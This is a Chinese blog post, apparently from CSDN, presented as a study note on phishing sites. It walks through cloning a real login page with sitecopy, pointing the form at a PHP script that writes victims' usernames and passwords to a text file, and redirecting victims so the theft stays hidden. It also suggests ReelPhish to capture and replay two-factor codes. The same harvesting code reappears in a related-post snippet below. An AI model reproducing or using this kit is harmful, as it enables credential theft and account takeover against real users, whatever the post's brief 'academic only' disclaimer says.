学习记录-钓鱼网站总结

原创 已于 2025-04-17 14:39:25 修改 · 5.1k 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2021-11-11 13:35:38 首次发布

学习记录-钓鱼网站总结
此文章仅用于学术交流

1.钓鱼网站基本原理
简单的讲,就是伪装一个和真实网站相同外表的钓鱼网站,让目标误以为是真实网站而进行一些敏感操作,如输入账号密码从而被攻击者非法记录。

2.钓鱼网站演示
步骤很简单:爬取下载前端代码-------修改action也就是传参目的文件-----修改username元素、password元素-----创建本地文件用于接收传参和记录敏感信息也就是action需要的目的文件-----跳转到某页面提高隐藏性

如百度搜索某后台登陆页面
在这里插入图片描述
下载前端源码,右键另存为可以下载,也可以使用工具sitecopy
在这里插入图片描述
修改action目的文件,这里是创建了一个2.php用于接收,传参统一修改为user、pass。
在这里插入图片描述
创建2.php,代码如下(这里是post请求,对应前端请求方式,也可能是get)

<?php
if (isset($_POST["user"])) {
if (isset($_POST["pass"])) {
$myfile = fopen("666.txt", "a") or die("Unable to open file!");
$txt = "━━━━账号=".$_POST["user"]." 密码=".$_POST["pass"];//$_POST["user"]这个变量的
fwrite($myfile, $txt);
fclose($myfile);
//在这里他完成写文件之后进行跳转
#echo '<script>window.location.href="https://www.baidu.com/"; </script>';
}
}
?>

这里需要主要是前端含js代码需要去看看跳转关系,这里需要修改跳转地址,这里为了验证改了百度,真实场景可以改到对应的真实网站让它在输一次。
在这里插入图片描述
模拟被攻击用户登陆:
访问钓鱼网站–输入账号密码—返回指定页面
输入123/123
在这里插入图片描述
跳转到指定网站百度
在这里插入图片描述
看看攻击者后台已经记录了账号密码,从而钓鱼成功
在这里插入图片描述
3.总结
1)sitecopy工具:爬虫工具,可以爬取前端源码,可批量;
2)双因素认证:登陆界面一般是含有手机验证码、邮箱验证码等,这个也可以做的,和上面一样多写一个相同的界面然后让攻击者输入验证码,不过这个有时效性,所以手动的话需要快速输入;推荐工具ReelPhish,它的底层原理就是循环去检查结果,如果有账号密码和验证码出现,会模拟浏览去登陆,这样就不用人工实时刷新监控。

SmileAndFun
关注
图解HTTP-HTTP报文内的HTTP信息-学习总结归纳【1.8】
qq_43416206的博客
02-09 1133
虽然存在可将证书无效化的证书吊销列表( Certificate Revocation List, CRL)机制, 以及从客户端删除根证书颁发机构( Root Certificate Authority, RCA)的对策, 但是距离生效还需要一段时间,而在这段时间内,到底会有多少用户的利益蒙受损失就不得而知了。接到证书的客户端可使用数字证书认证机构的公开密钥, 对那张证书上的数字签名进行验证, 一旦验证通过,客户端便可明确两件事:一,认证服务器的公开密钥的是真实有效的数字证书认证机构。
WEB安全学习笔记
chenrs727的博客
12-02 2217
基础入门 1.基础入门——基础概念 域名 什么是域名 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置) 由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。 比如www.bai
第一次尝试制作一个钓鱼网站,小白教程,超细!
热门推荐
qq_46089119的博客
02-05 2万+
钓鱼网站的制作
钓鱼页面之无视浏览器URL栏
Karka_的博客
07-31 240
本文列举了几种无视浏览器url栏的钓鱼攻击手法,攻击效果取决于实际构造的利用场景。希望对蓝军技术人员有所启发。网址打开需要输入凭据或者下载软件的网站,绝对不要将凭据或私钥输入通过点击链接到达的网站中。本文列举了几种无视浏览器url栏的钓鱼攻击手法,攻击效果取决于实际构造的利用场景。希望对蓝军技术人员有所启发。接下来我将给各位同学划分一张学习计划表!
钓鱼网站
最新发布
2301_81771576的博客
10-03 798
钓鱼网站(Phishing Site)是攻击者伪造的虚假网站,通过模仿银行、电商平台、社交网络等合法机构的界面(如登录页、支付页),诱导用户输入账号密码、银行卡号等敏感信息。检查拼写差异:字母“o”与数字“0”、字母“l”与数字“1”混淆(如 paypai.com 仿 paypal.com )。入侵合法网站后插入恶意子页面,利用“白名单”域名逃避检测(如政府网站下的隐蔽钓鱼路径)。诱导阶段:通过钓鱼邮件、短信、二维码等渠道散布虚假链接(如“账户异常”“优惠领取”)。
CS钓鱼网站实操
wutiangui的博客
05-19 524
使用火狐打开钓鱼网站,设置里选择更多攻击–web开发者工具调出网页代码,选择下图选取页面元素,点击登录,右键编辑。装完后选择内网连接进入,使用给出的用户名和密码登录。首先kali上用以下命令安装phpstudy。编辑替换后上传chaoxing.html。替换里面的onclick为真实点击代码。注意下图路径需先切换到wwwroot下。到kali的phpstudy中。
一个局域网下钓鱼网站演示的设计思路
09-30 3290
一般的公司会有OA系统,有一些操作需要在登录后才能执行,为了登录后能跳转到登录前的页面,OA的设计者有的就使用了类似backUrl=readInfp.html的设计,如果这种跳转没有经过 http://passport.renren-inc.com/login/login.jsp?ru=http://oa.renren-inc.com/vmain/login.jsp?rm=http
python钓鱼网站_学习笔记6.0 Django入门创建一个钓鱼网站
weixin_39640883的博客
12-11 611
太久没写博客了,2020年上半年荒废了大部分时光。从现在开始改变吧,学习django开发的知识。用了两天的时间,终于学会了如何用pycharm开发django,会自己写一个hello world。虽然看起来不是很复杂(确实),但中途踩了许多坑,所以希望后来的人看了这篇博客可以避免我犯过的错误。准备:pycharm专业版 + django2.1(兼容性好)由于pycharm会创建独立的django虚...
MITRE ATT&CK超详细学习笔记-01(背景,术语,案例)
Zichel77的博客
07-22 1万+
MITRE是一个向美国政府提供系统工程、研究开发和信息技术支持的非营利性组织,于1958年从麻省理工学院林肯实验室分离出来后参与了许多最高机密的政府项目,开展了大量的网络安全实践。例如,MITRE公司在1999年发起了常见披露漏洞项目(CVE,CommonVulnera-bilitiesandExposures)并维护至今。其后,MITRE公司还维护了常见缺陷列表(CWE,CommonWeaknessEnumeration)这个安全漏洞词典。.........
吴恩达Machine Learning课程学习笔记2 高级学习算法(P42-87)
weixin_46632427的博客
01-07 1916
一、引入(超爽中英!) 2024公认最好的【吴恩达机器学习】教程!附课件代码 Machine Learning Specialization_哔哩哔哩_bilibili(超爽中英!) 2024公认最好的【吴恩达机器学习】教程!附课件代码 Machine Learning Specialization共计142条视频,包括:1.1 欢迎来到机器学习!、1.2 机器学习的应用、2.1 什么是机器学习等,UP主更多精彩视频,请关注UP账号。
红蓝对抗-HW红蓝队基本知识(网络安全学习路线笔记)
heikewhite的博客
05-26 1497
由于钓鱼邮件来自内部邮箱,“可信度”极高,所以,即便是安全意识较强的IT人员或管理员,也很容易被诱骗点开邮件中的钓鱼链接或木马附件,进而导致关键终端被控,甚至整个网络沦陷。在蓝队的实战过程中,蓝队专家们逐渐摸出了一些套路、总结了一些经验:有后台或登录入口的,会尽量尝试通过弱口令等方式进入系统;冒充客户进行虚假投诉,也是一种常用的社工手法,攻击方会通过单人或多人配合的方式,通过在线客服平台、社交软件平台等,向客户人员进行虚假的问题反馈或投诉,设局诱使或迫使客服人员接受经过精心设计的带毒文件或带毒压缩包。
PHP实现简单的仿QQ空间登录界面钓鱼(仅供参考测试不可用于非法用途)
01-08
声明:此代码仅供参考不可用于非法用途,非法使用造成的后果自负 演示:界面 点击提交后账号和密码会被写入txt文本中,同时页面跳转 <?php if (isset($_POST[user])) { if (isset($_POST[pass])) { $myfile = fopen(abc.txt, a)/*abc.txt用于接收提交数据*/ or die(Unable to open file!); $txt = ━━━━账号=.$_POST[user]. 密码=.$_POST[pass];//$_POST[user]这个变量的意思,在所有post
Hosts文件与钓鱼网站
weixin_34126215的博客
02-01 192
有些病毒或***,修改你计算机上hosts文件,你访问某些网站就有可能访问到钓鱼网站,或者你的计算机不能打开某个网址,或者你能够打开网页,但是你的计算机不能升级病毒库,这时候你就应该检查一下你的计算机hosts文件,是否有额外的记录。 Hosts文件与域名解析 主机名称解析的过程 Microsoft 公司的客户端,应用以下方法把主机名称解析为IP地址: ...
社工钓鱼网站实验
Sig的博客
03-14 3208
社会工程学(Social Engineering) 社会工程学是一种通过人际交流的方式获得信息的非技术渗透手段。不幸的是,这种手段非常有效,而且应用效率极高。事实上,社会工程学已是企业安全最大的威胁之一。 (引自百度百科:社会工程学) 拓扑 需求 某网络拓扑图如图所示,局域网部署两台虚拟机,一台作为攻击者(Hacker),一台作为正常用户(Client)。(PS:若两台均为虚拟机,虚拟机网络...
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 3870
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
钓鱼网站原理
weixin_46244909的博客
03-21 1566
实验报告(钓鱼网站) 背景: SET和Ettercap实现钓鱼网站窃取用户名和密码。 实验环境: 虚拟机,攻击主机;kali Linux 172.20.86.90 目标主机;Windows 10 IP:172.20.86.88 实验原理: 输入vim 、ect/ettercap/etter.dns 配置DNS转发 google.com A 172.20.86.90 *.g...
如何钓鱼(如何钓鱼的方法)
12-01 464
如何钓鱼(如何钓鱼的方法) 捕鱼的技巧和方法 1.投掷和举起杆子 抛竿的关键是每一竿都要抛到位——抛到一个固定的点上,这样钓点才能产生一个立体的雾化带,鱼才能集中精力在你的钓点上。举竿刺鱼的动作,其实可以反映出一个渔民的心态。大多数初学者在看到浮标的有力动作后会用力举起鱼竿。结果,要么小鱼飞上天空,要么大鱼断了线。 因此,我们在举竿刺鱼时要保持良好的心态。杆的幅度和强度不应太大。遇到小鱼要飞,遇到大鱼一定要抄。其实鱼越小嘴越大,鱼越大嘴越平静。 2.水压线注意事项 压水线时,竿尖不宜插入水中过深
php钓鱼网站怎么做视频教程,反黑钓鱼网站全过程
weixin_26782929的博客
03-10 1494
一、被盗号找上门今天一打开QQ邮箱,看到个群邮件这货以发聚会照片为名义给出了一个网址Defaulthttp://202.194.131.20/xcb/xcb/link.php?id=73&url=http://yyhhj.emy.in/cc/?9330461http://202.194.131.20/xcb/xcb/link.php?id=73&url=http://yyhhj.e...
PHP钓鱼教程,记录一次wifi钓鱼的调试 ——新手
weixin_26997697的博客
03-29 521
最近在学习一个wifi钓鱼的东西,模拟某网站(以下简称A)的登录,并在后台储存账号密码到数据库中。原理很简单,将A的网页下载下来放到本地服务器上,然后搭建wifi,使连接wifi的人访问登录界面时实际上是访问本地服务器。本来模块挺成熟了,前两天测试正常,今天测试的时候发现点了登录没反应???倒腾半天无果。但是不是完全没用。当我输入A的ip时,点击登录没有反应,但是当我输入127.0.0.1访问A时...
dsniff-2.3:高效网络嗅探工具学习使用
总结而言,dsniff-2.3.tar 是一个功能强大、用途广泛的网络嗅探与攻击工具包,其核心知识点包括网络嗅探原理、ARP 欺骗技术、DNS 欺骗机制、协议解码与分析、会话重放、加密流量检测等。该工具在网络安全研究、渗透...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值